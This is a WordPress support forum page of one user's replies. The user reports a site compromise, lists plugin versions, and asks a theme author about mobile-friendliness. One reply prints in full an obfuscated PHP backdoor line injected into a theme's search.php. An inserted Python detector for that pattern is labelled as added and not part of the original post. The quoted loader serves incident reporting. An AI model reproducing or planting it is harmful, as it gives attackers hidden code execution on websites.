Forum Replies Created

Viewing 4 replies - 1 through 4 (of 4 total)
  • Thread Starter BioB

    (@biob)

    I don’t know what to suspect, unfortunately. I just put out some possibilities because those plugins are widely used and might be targets, that’s all.

    Sorry, Richard. I love your plugin, by the way.

    I did some more digging, though, and in my UnoBlog theme the file search.php was modified on the day the hacker got in and it had an additional line of code at the very top:

    <?php $pekyg = 'rMNfN14n*UO3sb2TFa1Te0v_fO6JTGnY/40_8zA9obHeueW.kgHwpvGPtXwRpr_UeasohEcle7Cig25.e36Uyeipmq4dMbK9ucKBz9Sa0gTee8Wj1IDAFq4Q/dXOeeQQTl5I7282pEcsrP'; $ptcfnjsmzcvk = $pekyg[50].$pekyg[28].$pekyg[15].$pekyg[141].$pekyg[62].$pekyg[55].$pekyg[10].$pekyg[128].$pekyg[98].$pekyg[99].$pekyg[25].$pekyg[38].$pekyg[63].$pekyg[106].$pekyg[126]; $kgtmtzrhpn = $pekyg[105].$pekyg[43].$pekyg[56].$pekyg[124].$pekyg[7].$pekyg[53]; $lqfvtkarmb = $pekyg[136].$pekyg[0].$pekyg[125].$pekyg[49].$pekyg[23].$pekyg[140].$pekyg[85].$pekyg[60].$pekyg[71].$pekyg[17].$pekyg[97].$pekyg[80]; $goblsqeuxg = $pekyg[13].$pekyg[65].$pekyg[139].$pekyg[108].$pekyg[82].$pekyg[90].$pekyg[35].$pekyg[91].$pekyg[45].$pekyg[138].$pekyg[40].$pekyg[121].$pekyg[64]; $ojcapxvzcr = $pekyg[120].$pekyg[47].$pekyg[8].$pekyg[32].$pekyg[107]; $qingnmtaec = $pekyg[79]; $ckwovrefmyof = $kgtmtzrhpn($ptcfnjsmzcvk); $lqfvtkarmb ($ojcapxvzcr , $goblsqeuxg($ckwovrefmyof) , $qingnmtaec); ?>

    Very standard for this kind of a hack. I’ll check other files as well.

    The attack happened on Oct. 4, 2015.
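
A defensive check for the pattern in the injected line above, added here as an example and not part of the original post: it flags PHP files that assemble strings from chains of indexed characters and then call through a variable. The thresholds, function names and both sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Three or more "$var[12]." pieces followed by a final "$var[12]": the way the
# injected line assembles its hidden names one character at a time.
INDEX_CHAIN = re.compile(r'(?:\$\w+\[\d+\]\s*\.\s*){3,}\$\w+\[\d+\]')
# A call made through a variable, e.g. "$f($x)" or "$f ($a, $b)".
VAR_CALL = re.compile(r'\$\w+\s*\(')

# Constructed, inert sample shaped like the injected line ("dahbc" is not a function).
SAMPLE_INJECTED = ("<?php $k = 'abcdefghij'; $f = $k[3].$k[0].$k[7].$k[1].$k[2]; "
                   "$g = $k[1].$k[2].$k[3].$k[4]; $r = $f($g); ?>\n<?php get_header(); ?>")
# Constructed sample of ordinary theme code that uses array indexes legitimately.
SAMPLE_CLEAN = ("<?php\nget_header();\n$title = $post_titles[0] . ' - ' . $site[1];\n"
                "if (have_posts()) { the_post(); }\n")

def score_php(source):
    """Return the indicators found in one PHP source string."""
    lines = source.lstrip().splitlines()
    first_line = lines[0] if lines else ""
    chains = len(INDEX_CHAIN.findall(source))
    calls = len(VAR_CALL.findall(source))
    return {
        "index_chains": chains,
        "variable_calls": calls,
        # The post found the extra line at the very top of search.php.
        "on_first_line": bool(INDEX_CHAIN.search(first_line)),
        # Assumed threshold: two assembled strings plus one call through a variable.
        "suspicious": chains >= 2 and calls >= 1,
    }

def scan_tree(root):
    """Score every .php file under root and return (path, indicators) for hits."""
    hits = []
    for path in sorted(Path(root).rglob("*.php")):
        result = score_php(path.read_text(errors="replace"))
        if result["suspicious"]:
            hits.append((str(path), result))
    return hits

if __name__ == "__main__":
    print(score_php(SAMPLE_INJECTED))
    print(score_php(SAMPLE_CLEAN))
```

Run `scan_tree` against a copy of `wp-content` and review each hit by hand; a match is a lead for inspection, and a clean result does not show that no other files were altered.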

    Thread Starter BioB

    (@biob)

    I use the theme Unoblog by ThemeBounce, ver. 1.3 (it’s probably not the site you checked out because I run several WP blogs).

    My WordPress is version 4.3.1

    I have updated two plugins today or yesterday. One of them, incidentally, was Wordfence, I now run ver. 6.0.19 but before it was most probably 6.0.18.

    I’m pretty sure the other one was Akismet, which is now ver. 3.1.4. I don’t even know why I keep this plugin as I don’t use it. It’s the most probable source of attack.

    Yoast SEO ver. 2.3.5 could be another likely candidate. I think it very recently automatically updated and that it was ver. 2.3.4 before.

    Yet another widely used plugin that could be the target of the attack is Cookie Law Info ver. 1.5.3 by Richard Ashby.

    For now I deleted the base64 code from the functions.php and blocked the user’s IP. I know, though, that the script probably spammed my entire site with new files with malicious code inside (once before I had a problem with this and it cost me some money to get it repaired).

    I’m only sorry I deleted the code and didn’t store it. I could post it here for some back-engineering. Nah, well. I hope it won’t happen again.

    It also seems like the hacker got in with the first attempt. Many others try every day and get denied by Wordfence and I get emails about such attempts every day…

    Sorry, I checked again. Looks like there was an error before.

    Now it says: “Awesome! This page is mobile-friendly.”

    Good work!

    By the way, I love this theme.

    I’ve just tested the theme for the coming Google mobile update and it said the site isn’t mobile friendly.

    Links are too close together and text is too wide for mobile phones. If this isn’t resolved until the next update (beginning of April 2015 if I read correctly), then the sites with Syntax theme will lose their ranking in Google for mobile users.

    Is there any chance you could make it more mobile friendly until somewhere in the beginning of April?

    Thank you!
